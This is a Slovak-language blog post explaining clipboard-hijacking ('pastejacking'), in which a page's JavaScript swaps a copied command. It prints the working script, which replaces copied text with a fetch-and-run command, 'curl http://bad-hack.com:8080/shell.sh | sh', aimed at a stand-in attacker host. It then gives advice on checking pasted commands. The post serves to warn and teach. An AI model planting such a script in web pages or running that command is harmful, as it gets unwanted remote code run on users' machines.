Snáď každý programátor, správca informačných systémov, alebo sieťový špecialista používa terminál na zadávanie príkazov do systému. Ak sa nekonfiguruje niečo špeciálne, tak drvivá väčšina príkazov je už napísaná, stačí ich vygoogliť a skopírovať. Nie je na tom nič zlé, keď príkazy kopírujeme (kto si ich má pamätať). Niektoré príkazy sú napísane dosť komplikovane (dokonca na niekoľko riadkov), ale musíme mať silnú dôveru v autora aby sme príkaz vo svojom terminály od-enterovali. Pozrime sa na to ako to funguje v praxi.
Týmto hackom som sa inšpiroval na jednom webe, kde sa autor venuje IT bezpečnosti. O čo tu vlastne ide? Do html kódu je vložený javaskript,
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://bad-hack.com:8080/shell.sh | sh\n'); e.preventDefault(); });
</script>
ktorý zabezpečí, že skopírovaný text z webu nesúhlasí s tým čo sme si mysleli, že kopírujeme. Nakoniec na youtube si môžete o tom pozrieť video.
Toto je praktická ukážka čo dokáže javaskript. Skúsme si skopírovať nasledujúci kód aby sme v linuxe aktualizovali repozitáre. Čo sa stane?
sudo apt update
Neskopirovali sme sudo apt update, ale curl http://bad-hack.com:8080/shell.sh | sh. Tento príkaz stiahne z http webu shell.sh a odenteruje. Shell.sh môže obsahovať záškodné príkazy, resp. skripty, ktoré môžu poškodiť celý systém, alebo spôsobiť omnoho väčšie škody (prepísanie IP adries DNS serverov, prip. upravíť /etc/hosts a pod). Vždy pred kopírovaním príkazov z internetu je potrebne príkaz vložiť do txt súboru a skontrolovať či je v poriadku. Ja to robím vždy tak, že príkaz si ukladám rovno do dokuwiki a následne ho kopírujem do terminálu. Skutočne je potrebné dávať pozor čo kopírujeme. Aj keď v prevažnej väčšine, tvorcovia príkazov nemajú tendenciu niekoho poškodiť, ale vždy sa nejaký záškodník nájde.
Toto nie je žiadna novinka. Tento kód sa objavil na internete už niekedy v roku 2008. V dnešnej dobe sa tomu dá zabrániť rožnými pluginmi do web prehliadačov Napr. pre Mozilla Firefox existuje plugin Copy plain text.